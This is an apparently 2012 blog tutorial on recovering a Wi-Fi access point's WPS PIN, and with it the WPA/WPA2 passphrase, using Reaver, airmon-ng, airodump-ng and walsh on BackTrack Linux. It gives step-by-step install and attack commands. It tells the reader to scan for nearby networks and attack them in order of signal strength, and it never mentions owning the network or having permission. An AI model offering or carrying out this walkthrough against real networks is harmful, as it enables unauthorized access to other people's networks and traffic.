Tuesday, 2 October 2012


WPS (Wifi Protected Setup) is a feature created in 2007 to make Wifi Protected Networking easy for the average user while making it secure. However due to a design flaw in the authentication for the PIN for the device, this has allowed the ability to Crack the PIN on a WPS enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although it will be obtained with this method.

The PIN is broken down as 11112223 (Example for explanation only and not to be taken literally)
The 1111 is the first half of the PIN. The 222 is the second half of the PIN. The 3 is a checksum of the entire PIN (first 7 digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). When reaver is running you will notice 1111 changes 222 remains same and 3 changes, until it obtains the first half of the PIN. Then the 1111 remains same, 222 and 3 changes as it obtains the second half of the PIN.

Tools needed
Linux Distro (I recommend BackTrack 5r1)
Reaver https://code.google.com/p/reaver-wps/dow...=-filename
A compatible Wifi Adapter (research your preference ie; AWUS036H)
NB: Reaver will only run on linux and why BackTrack 5r1 is recommended.

With Backtrack Running download Reaver
extract and install reaver as follows from Terminal:
tar xvfz reaver1.xxxx (xxxx being the release number which will change with updates)
cd reaver1.xxx
cd /src/
make install

Assuming no errors lets continue
Open a fresh terminal and let get the adapter running in promiscuous mode and type the following

airmon-ng (this will list your wifi adapters, most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
you should receive output that tells you which Interface is in Monitor Mode. Most commonly mon0

Now in the same terminal lets see who is around and type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 sec or so till you see all AP's that you can. Hit CTRL+C

AP's should be listed by power so you want to start with the top ones and work your way down the list. But wait.. how do I know if WPS is enabled. Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS enabled AP's in range and remove the guess work and compare it to the airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the Terminal that you installed reaver with and type the following:

reaver -i mon0 -b BSSID -S -vv (Change mon0 as noted previously. BSSID is the MAC address of the AP. You can use the MAC from the walsh output or the airodump-ng output as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PIN's tested.)

Now just let it run.

You may see the percentage in reaver output go from 2% to 90% just like that. This is normal when it finds the first half of the PIN. This is also why you will notice the second half of the PIN as noted above as 222 remains constant before it finds the first half.

Errors are a common thing to see and caused by many variables.
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.


Post a Comment